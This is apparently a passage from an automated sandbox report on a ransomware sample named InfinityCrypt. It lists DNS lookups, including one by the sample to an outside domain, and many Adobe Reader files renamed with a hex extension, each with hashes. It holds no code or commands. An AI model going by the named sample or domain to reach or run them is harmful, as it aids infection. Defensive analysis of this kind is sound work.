                          dns
                          firefox.exe
                          66 B
                          115 B
                          1
                          1

                          DNS Request

                          collector.github.com

                          DNS Response

                          140.82.114.22

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          150 B
                          182 B
                          2
                          2

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.113.21

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.113.21

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          150 B
                          280 B
                          2
                          2

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Request

                          glb-db52c2cf8be544.github.com

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          120 B
                          152 B
                          2
                          2

                          DNS Request

                          api.github.com

                          DNS Request

                          api.github.com

                          DNS Response

                          20.26.156.210

                          DNS Response

                          20.26.156.210

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          120 B
                          269 B
                          2
                          2

                          DNS Request

                          api.github.com

                          DNS Request

                          api.github.com

                        • 8.8.8.8:53
                          arizonacode.bplaced.net
                          dns
                          Endermanch@InfinityCrypt.exe
                          138 B
                          170 B
                          2
                          2

                          DNS Request

                          arizonacode.bplaced.net

                          DNS Request

                          arizonacode.bplaced.net

                          DNS Response

                          162.55.0.137

                          DNS Response

                          162.55.0.137

                        • 8.8.8.8:53
                          137.0.55.162.in-addr.arpa
                          dns
                          142 B
                          198 B
                          2
                          2

                          DNS Request

                          137.0.55.162.in-addr.arpa

                          DNS Request

                          137.0.55.162.in-addr.arpa

                        • 8.8.8.8:53
                          prod.balrog.prod.cloudops.mozgcp.net
                          dns
                          firefox.exe
                          164 B
                          196 B
                          2
                          2

                          DNS Request

                          prod.balrog.prod.cloudops.mozgcp.net

                          DNS Request

                          prod.balrog.prod.cloudops.mozgcp.net

                          DNS Response

                          35.244.181.201

                          DNS Response

                          35.244.181.201

                        • 8.8.8.8:53
                          prod.balrog.prod.cloudops.mozgcp.net
                          dns
                          firefox.exe
                          164 B
                          350 B
                          2
                          2

                          DNS Request

                          prod.balrog.prod.cloudops.mozgcp.net

                          DNS Request

                          prod.balrog.prod.cloudops.mozgcp.net

                        • 8.8.8.8:53
                          prod.remote-settings.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          188 B
                          220 B
                          2
                          2

                          DNS Request

                          prod.remote-settings.prod.webservices.mozgcp.net

                          DNS Request

                          prod.remote-settings.prod.webservices.mozgcp.net

                          DNS Response

                          34.149.100.209

                          DNS Response

                          34.149.100.209

                        • 8.8.8.8:53
                          prod.remote-settings.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          94 B
                          187 B
                          1
                          1

                          DNS Request

                          prod.remote-settings.prod.webservices.mozgcp.net

                        • 8.8.8.8:53
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          206 B
                          262 B
                          2
                          2

                          DNS Request

                          prod.content-signature-chains.prod.webservices.mozgcp.net

                          DNS Request

                          prod.content-signature-chains.prod.webservices.mozgcp.net

                          DNS Response

                          2600:1901:0:92a9::

                          DNS Response

                          2600:1901:0:92a9::

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          16B

                          MD5

                          b905ca541492c639fb0f0bcce0da4c2d

                          SHA1

                          35d4a19b9ddd1f89ba12293db7b6dea4819079bd

                          SHA256

                          a7df30f30873065cadfd24597c504e47e501a3440725f12537542b8ea1e8b372

                          SHA512

                          139492f3fc25f42cdbb059e97244535249e7ebefc013fd900220c8bb5d97c244d33b86bd47e722c86d1b34321724acf4666fd2d1193616045bf59c25ec3e4ff9

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          720B

                          MD5

                          5385e1b521fe8101d18ba29fbf205efd

                          SHA1

                          3a6e58dc5b8e7662d41df8fcd0b141bac407db41

                          SHA256

                          11427d5335be228fd245b3f8711d1766d1ba4063e553b2b904d6a9947097a443

                          SHA512

                          880dbbc015944effd4285e108d9f90e35369cb947ae2221210fc50c424bc5922001f43e88aaa22e83d84599c1cf1baa424c19d9fb84003799d48512cd78d5c90

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          688B

                          MD5

                          2a891f2e44fea3a70fb8278d3b044546

                          SHA1

                          fed96654b5738edfa25966ddab8796d3e8420218

                          SHA256

                          618cebfbe3c9adfc6d1238baa277226ad9f098013979c1bc1b2e0e87ddf79dfe

                          SHA512

                          bb56c6385882887237d4857b59b2f8cca622226a2f4aac5ce9791e2983c286293247e96d9740f4a3265746d5bb02f5e9362945bf08a6d6a81258ed21040c7b63

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          1KB

                          MD5

                          bcf26309a605dbfb9f350b889cc29f85

                          SHA1

                          cadf0d0696f62cf310d08bdb2bfdb8f08963f50b

                          SHA256

                          e286756af13bf30fc6b0cfea1a679d5d922c89eb6b4f84b5e0ddec1f6752701b

                          SHA512

                          4d3f7eeec4e9e6e64d9a9508cd653f0781f5ffecd8c086515326bd9c7b53ebaf5971f2fdbebb056217b13f0afe5f5304402138d9fdb0cbfd2a96bf1e701e81e7

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          448B

                          MD5

                          4a500033fae54ffd0f74144b75b268f3

                          SHA1

                          932d3a60a521c9aab36a5859ca99144dc61ba0dd

                          SHA256

                          fe70c4b6e6c3e86e28ae4165eb6794ce685a9938c347353f6cf99df9412aa29b

                          SHA512

                          66ff4ba5fc1a561728335509911558218ae78615a475b14066fb523e8edd7e22ea4cd2519724198727e8a292fec5d5b74967f2b106616eaa43c9e3188f516848

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          624B

                          MD5

                          9b568840a7f1475462fcf38366e8bf7d

                          SHA1

                          64db3f1c89d118d7a3970508581038e7a7bc4c32

                          SHA256

                          5be108a883cd5c385ec53caf5c242baf1d121c4c6b9fc81c59304a448e840574

                          SHA512

                          3cff8f8c0abe53940a7b23d376e5bc6058850048eda578ba4df0bb9f7215ec60a045343856c8754790cc01dca72162ddcaf51164373ce5f24d7569e29ccfdff2

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          400B

                          MD5

                          4cc7d0a67f0f2ead686227086cd350a9

                          SHA1

                          7d1d66ced82fefb949b75b2dd6da54a31b2d1625

                          SHA256

                          64382f3560673fe08e838d057d315ac5bf85704c77000d180df130ae7382290d

                          SHA512

                          831d74ee438d03a42a62f5596d17bd7b93e09cf03983abe2710c7ae9a5654cfc19ec286fd89d828e1ee93d977863144a97554ab6a7c71afb5232879253fc0943

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          560B

                          MD5

                          ff79c67ce9ba2c832c6f7298f49f0bde

                          SHA1

                          6fcbfd87b00561f5260d0f70747a934ef6e760e8

                          SHA256

                          6a3a8a47299cfb0646f92b83a2c97da00aff136bde47d5ed25145fa7932c4b28

                          SHA512

                          3f68ef597d0422952d6f2d4363c6fa2babd3d4c95c6d8ec5efc78f021cdc8bf5e1352a24bed2853bbe9b0a908415d2bed4ead4ffaff6b8c196acd400a41e796f

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          400B

                          MD5

                          ecbbb60a984e325b6e8987fa213f26db

                          SHA1

                          c95a43d68ba13d266aa6ea3e52cc697e79c37f27

                          SHA256

                          dce3ad8a1faae4373747408e372d9e5fbcb35cce9993750eb6b23fda643bdbf8

                          SHA512

                          cd4dc4da8f2c260636ba3ebbc196008deddd4168cef2e1413554677004762848636a915c449e32ab7fcc1bf1c5cd4a042ec9a5811b81fb6b9f9517db78c83941

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          560B

                          MD5

                          525d2827863aa790b8d894c9ff8736a4

                          SHA1

                          9e27bd6f3e8ea71065595290a0b918ccd096964c

                          SHA256

                          b26179a80fcd7be2d5ae42ada1e666a995510cd4ea121da9f8ac9e9824e9c653

                          SHA512

                          beebfe87af5a74ec305e19a17c118792ffa01db9dfe404b68eff55d9495217218176b76e9438007ade53c3d2399e11be94444f2a14b6654d4dd7913416e1770e

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          400B

                          MD5

                          39d7d3ee658d659a1e25c3236d2d1970

                          SHA1

                          ae4f702079b4be182f71cf33a4f9da460d3acf21

                          SHA256

                          e411e8fc76480358d6fc03d0ab43ef7556b5752ed8fc0cf2cc36b77bea2caf54

                          SHA512

                          2b3f8c699993b402ca584ac661348e6baa2bce928150269c0c0f4def4c305699ccca870ef457a783f3abc26a1613a7f271e7814810708948aea12119ba84092b

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          560B

                          MD5

                          8a2381af62dccc352e4a912ad663a52d

                          SHA1

                          dbdb4c8229b777e528f7c4fdb22476a449dcd158

                          SHA256

                          32d625d923ff9438d4bbdcd7ae99f5394157e9c9d5f415460b579a8fd57a75e1

                          SHA512

                          715048d798f4544a3a2ac8bde2358df3191159c65a2010d724188468ac9211339ca77e1bd0078045a294d0681f807cd9ad34d74de5ac14766da46c9b539015ce

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          7KB

                          MD5

                          84e350e02f39b1e1c478277858503651

                          SHA1

                          0c3a697e5330329ad1255a1b7a6316bfa2b462d5

                          SHA256

                          894f18fea32f0a76ad7d2ab6241eaacfa8bdccfedf3d5a6f24654077c8dadc0c

                          SHA512

                          76de12cc91de6e011a8138177ff5fd75f4734142439fd870215e15fade102366cf0ee26cfb5ab50eaf4d380c44e7013b91c373ab18cb53fc3460e3a44992d024

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          7KB

                          MD5

                          ac68f9ed24518ff7eef2024f42ccfe2d

                          SHA1

                          320a03c42992fafc4ea7f74e5403a78f53d1639f

                          SHA256

                          c681d1f4c688fa5b46c068837a75df5df4782cab8b8425db2d443a3647689ecf

                          SHA512

                          35b9fb18e8c8881dbbcbacb7a6394e8a82b72837d9e7b4dfe180d36e3f3e92911435330fb1f1e1f3a4840797dad68fc8e25c859983d73aa05db9fa0e43178b71

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          15KB

                          MD5

                          1513858264154f08b3564706db6f50bd

                          SHA1

                          45efa63189d8fdaa870d943869763c236a46253f

                          SHA256

                          b5d0ef9b0d5f28d83ac335d6ade824ddb93866bb253da5ae8df1ab8b5dc96d81

                          SHA512

                          e661f36e528ce61768dfbde47225e31a37a4763273e0a4e8908bdb489ebe5b4d35997dae91ffd73d3ee1ac872d867e93b9ecb2731e467bdbdc2de28054713b3e

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          8KB

                          MD5

                          b0a570284125e2764a65976040a50ec0

                          SHA1

                          1d073feb4d95267220281f7bd70df7d53874329c

                          SHA256

                          6d49f6b1e9c4283466c67f111d3cb6de6f8c8c684bbc45740dcb6930e49b91de

                          SHA512

                          5098f21b275b2e133c53868c51114c59fbfc1cae436b58ef44980d2667d7e9e760505bdf526c98a23a250722c7f6065b6724cfe3dedaafe5190133cb128bc1a3

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          17KB

                          MD5

                          57eff698b3f3f251c115df5d75fd8806

                          SHA1

                          34130e37fdff7dc09ca60a7c884770f239c46ebe

                          SHA256

                          79be1f359baabaeb73cd80a41a5b1f62f7d04da5d6072867e109ba682ef1129c

                          SHA512

                          7e3d5c9264d6451ffa5ec4e8c478b06509894498c6b807a0971b6ff8771ad4a085a7d908e869006a8e83d0f42ef08d1231373d8b63143482664e7f0aca496c08

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          192B

                          MD5

                          af76edf5426b70da525ea40e81a95f79

                          SHA1

                          c220b43ced5813c95efd17810d6078ea9b745358

                          SHA256

                          c2bd735ab6cdfa56a0e974144ef2a1c56cdc2c058749e2cb6f456a920f71dca7

                          SHA512

                          a3aa1a08322f7cce04b00b6c4e74fe6d5f55cd57a80c3a07a5dab56440efc58982bbd869d312c64f793007e019779fd9d1994a2db074c779cb7493b1aa49e3b0

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          704B

                          MD5

                          5d2be6ec9bfd04d0faf20b195c816df4

                          SHA1

                          0e46a7893d844dd175b8a3d41613ef1d6ae80e9a

                          SHA256

                          fa7f9c887fcf74a3270b2cfe52b1cdb5d37d3f71852f72a6557a032aba2be434

                          SHA512

                          68f3e83d70057e4bf4e85965131ad7c6a1bbaebd811d971c564edca45e432379b663ec2f2467ee4b5b24c3ff0fe3eb63972bcdf5a07dbe78e1ce66133ed956a9

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          8KB

                          MD5

                          be50e858611b171e92526925f9cf3ba4

                          SHA1

                          ca7b8f11e954bbb78b4a2809c09c89f38a30607e

                          SHA256

                          00fae31ef0f05fde05a3fe832d7f2fe7d6f952c8f8d85ebb1affa2f8467e409e

                          SHA512

                          95431b3fd46ddb04c7f7319c8c30f0c42f177a514b44897fe5349f9f18fe395921d38b76cb70ace60cecaaa733dc9b2d9874b11107e864f62ce7125e0d915ac5

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          19KB

                          MD5

                          9b4eea1c86d98ca5a25e5cb438dd98a1

                          SHA1

                          5f0f7d9925a4539e464315eccd4ad784c862936a

                          SHA256

                          907da34b99a0a91b1c3a5e410c012dd687eb4a2d7729f3644d90aad80a1fe98b

                          SHA512

                          6df2bed74a12bff592cd8c51f147734f8935cb2df10c1272ba867c372c9cdfd59b04105f31dd982c22f906b1afdb31639efda62c2bc67e529ba7c0baca9a8b09

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          832B

                          MD5

                          4fba0bcc6f17c6b9a4f453fb067c2920

                          SHA1

                          9909a48ba48a6486ba412e26d1dc84218dcdc386

                          SHA256

                          90b81c080f01c27f6dbe4aa0f3cba1e800960064233069fa37bd784233d4c46e

                          SHA512

                          05ff0d484844bdea5e791bea7462bd5cfaacd1000d691cb477d5f110cdad07c3194e5121dd0c35ee5082f0b27cb1ce4ab21b99dd895cf3edbc55067d16d19cde

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          1KB

                          MD5

                          41cfa656861084285e016d3608443a09

                          SHA1

                          9a84f7566ba0a1f83aba7182b5b53e72dd4410d6

                          SHA256

                          6e7f8c214771100d9b28b5860bab1ac2a07138119295a13d1b5a377c5910cf23

                          SHA512

                          4543d6f74c6acff7cfdb2ca98902c464dfed51cae18b850700c16487619c470adb0b4e0495cecb85277a4c7c6316f6c6b811afd9ef93c0fc3d9bb5f6620ec820

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          1KB

                          MD5

                          9161b0c5fbfd65ba6fe98fd9485f3b3a

                          SHA1

                          95d47af20b96b4e526cef550742a83ab55520e9e

                          SHA256

                          111215d2686a9d05d1d68f6ed9e8633c521f806a903592c8260ab08cedd43ab9

                          SHA512

                          051a11a946abd7bd67e66270fbeb5bb707c18c733133d1b8c45aca9b67d8d780c3e26b29e87d4a2c24533ee9c8ec56b039c7a8db4e47a789040beeb341949fac

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          816B

                          MD5

                          1110381031c54d3ab1888ec3b8fb93cc

                          SHA1

                          5f5a7a9de91d524e6c560a1e0b9dab07423780ab

                          SHA256

                          c21cc44b173d15408ae7a9e52a9b13855fb878c55bbaf9e449dd8b578d74cc8d

                          SHA512

                          fa6386c83e0950d0eb272d5886c6fd25e5a117c72ac16a604572776151607afdd7d739765dec8886dc1aeef20b57b92fc12f26243c545ab0787f462201161593

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          2KB

                          MD5

                          b2a1d5e3e662dda2bbcb244dca9ad4a7

                          SHA1

                          220f9f92d1dd17cdbc84ae8f7c2407d3febec2cb

                          SHA256

                          a4a9ba7740251c96b4350ad4b83fd85207997ec7f30b8d7febe048096df4b929

                          SHA512

                          f01a9792e25b1ec7dacbcbe546bf5b96ae928947e1dfed8aa8d04bf1a700fb3729ebfa41ec71676c7e97e12294f99e751a262f0cf254ae29676830de46af600b

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          2KB

                          MD5

                          9d889ed47e11b8ebaaeb0acb11720c35

                          SHA1

                          f42def172fcdc504bdb8320c941870d519b138b6

                          SHA256

                          db2724106d388d34408cff8e04ba0de7652e421e4ba2c6287ba982c7b1c456d8

                          SHA512

                          f8fe26538e6ef0f5015fe7b3307accc5d0e12e4131c6c27bb2f9794632cf13014fd421c229496cf8ec9e0dbbd2eed2a1be31b80ec37d54bb1e13d8a0e2d11ae3

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          4KB

                          MD5

                          2ecd9ccdd99a4c9647fdb5c063eb3d0d

                          SHA1

                          6d57382a568fcd98b037d25ec2e8e527bd1656a1

                          SHA256

                          61fd9a7c27f70a178e47e2ab3a468efb15d9aba4df7fd7dd7185092a2523c7a9

                          SHA512

                          ea883a18459b0633f56bc739d9cdb48b2f3b1c8bc611e133e5aa3b93b50c906df4ef79679e58c4bb8fdc6dfe1fc1176f1b7c77649ad6bd856005d65064fc14ca

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          304B

                          MD5

                          3bb1c64b3d952fb4b16394b4f244658c

                          SHA1

                          ea23d5045b79fed928ee99ec10ad9a8456981db4

                          SHA256

                          e531da4a75fb02e017c3b189bd113b4562c01c8ea5e3694188327a48ce284700

                          SHA512

                          4bc1a65e12b8ee9a9dd8c5e67d297136d396f32e5d5ffa8af8ac58ca0d7c72ea17abf68be2245795a86220a7632792e019e4f96debb0c8f81a28b6d346f97361

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          400B

                          MD5

                          584f3ef6d8736d4537199abdab5e89ff

                          SHA1

                          decd32338224f10a990439a66b70048a64c719d7

                          SHA256

                          f0e64fee578aba91091fa96a21f54ad24288ddee8b30f4019e5412e0cdabd0ed

                          SHA512

                          a16c6fab559e9477b76e5faf7a254502387d3a28427fcbb7019113434f89295c3f4c1376f6e437e141cf74955cab41ee4416925d4eac45f3db035be00754a8a7

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          1008B

                          MD5

                          a5afcc977c90284700d3d5772e5758f0

                          SHA1

                          a70374ab86c66f6c639fda521d6c385259f64df0

                          SHA256

                          76d1478ea5437dc4cfdaa46cde6d96ab2dba67e2301f174a889119888c581c80

                          SHA512

                          960926d4f949e612e3c60c4fb05f97aede36e47273bd820114b65a206a515404c4c1e8f6765df5ac1c8ecb53eb2d90fd1257175448f43394926923b2e53a2059

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          1KB

                          MD5

                          70b5a331d31b870c7433fa193d7d4de6

                          SHA1

                          2003336dc21af52693bc616b2345757dd5d8010b

                          SHA256

                          7fdb87f2793225abbd8f2ae6ecef7f44f7eec8248d8c134836bf7eb6e006451f

                          SHA512

                          d625f3d36b943348c469da74dc36f1be37d07f38f8130823b548895f44880f7a97eb4c08a4c97d06714d769d22d54d53356d24dc2c32eef3f6f2c5a801faad0c

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          2KB

                          MD5

                          20044fe631bc9c9e19656a0b224ff8a5

                          SHA1

                          437c38fdd756170df10fbfe25e54c451f8d8347a

                          SHA256

                          fc34fba897501b013c52a5d7e3a8fe0b4164b224a80526dc563441ddfa2635fb

                          SHA512

                          32bd3d9ee504162bc8ebd2f9ed0eeb57f6308e179f144614a70c496540a46d250b94466f268d2c01e5b8ba0969de2072083c29bd4771a12103a3eadca51d8bcc

                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          848B

                          MD5

                          7beeee5d0612be3b7da4098779b09fc1

                          SHA1

                          f8a614ebee8e65e804a67e5f8c3c4ecc308c2004

                          SHA256

                          d9ef8eac9670ffc17d2b7a7430900e95fd3123855d519dc56a1ee8cef7750171

                          SHA512

                          1386157dfb2bfbe979f87fd202367dc3ddd2a1ea14756deda9b16420e884af6aebf0f8bd7698a04695d4b523affe2612e8c8d866a95373abdb7ba3d7c4104750

                        • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD

                          Filesize

                          32KB

                          MD5

                          43d5acbee80014a756f38461eb8d7520

                          SHA1

                          de2e201e66ed712427fbd36647fc19a230e6af46

                          SHA256

                          b9646db910a56698f2a7673818d14b9ec9782efe777bf1894ecacecd37405efb

                          SHA512

                          66699956c6d468ddf0423b2d4d063882ec7bb580432aa9869f7eb17d807695c902f821e730cd51cf41b9f2ed305caa5029de84d1e3dedaaee26160d231d7c838

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lojadwsr.default-release\activity-stream.discovery_stream.json

                          Filesize

                          21KB

                          MD5

                          5fc06838110ef2e2cdb04fa53a4ac345

                          SHA1

                          bbdb8d808617ff178253514f92066088430e4f33

                          SHA256

                          e961bf4b55ae02cac7d0d22f3d6ef3200dbb09041100d2ae75bf10791908369f

                          SHA512

                          926ea8271e5c7dc0f423008b51b19bdf1503babdbc37dd22b0b4c2749ec83586bdc2753eec64ac714b8e8f039e2141b6ba2c97af949c123cda7943e16880c102

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lojadwsr.default-release\cache2\entries\06AE02E19CFBD939DBE0AA3D436105938223B523

                          Filesize

                          34KB

                          MD5

                          45d3404f02b7b983de27c46cac5baa3b

                          SHA1

                          2876db47e0e7b4db1426d742a1ccb9a02048e2cb

                          SHA256

                          19b13fa6865254a98f8541797f0f669fe66572dff7a928ae1af653a8025230a8

                          SHA512

                          7b18f5410a1fb3ec730ed3033b021d22c4cada46db8a47f0ba14f8a3903ec06d2f73855d390b90cdd2e57a020fcb431890c42b0dcccb3b4587230c7cda930575

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lojadwsr.default-release\cache2\entries\40A8F58CFC1A23A6BAE836E45F467F9B93975806

                          Filesize

                          41KB

                          MD5

                          546684e5d645910cde8e636ecad18b30

                          SHA1

                          570adc5af295bd8df87cefc1ca896dc987185c2e

                          SHA256

                          dc27e017f8bd90cef561a33d2c018e73bee4b39b7cd7a345a856bf2bd472ccab

                          SHA512

                          fda809d93c31e7d60f532627ec313f0f0745cce66d628a09b3cc66e26c58a364776c6278125564bb33232d99e36a0c6621bdb14c5d85304cd228e4977a59407e

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lojadwsr.default-release\cache2\entries\50F1259662CD4DF41A8A92EC0A96A572A1381D1A

                          Filesize

                          46KB

                          MD5

                          14406471fafe07ebdb052422be29696b

                          SHA1

                          d8fcf707b28711891b4856fdd524309b5ea3612d

                          SHA256

                          b7453b140354605a9f876def9655dffc7e0ad139a749fb986f47b33975cb0804

                          SHA512

                          8ee7fd58876828ed618236b6d8a4d32e5e586888c2c89538d0ddefc9c82a4c047c23fd8db55cd6aa704fffb03a27edcf7e2b9d8e86d6469cfeaa74f5249361c1

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lojadwsr.default-release\cache2\entries\DD6D5E0884B994D28229649EDDE60F441288861E

                          Filesize

                          44KB

                          MD5

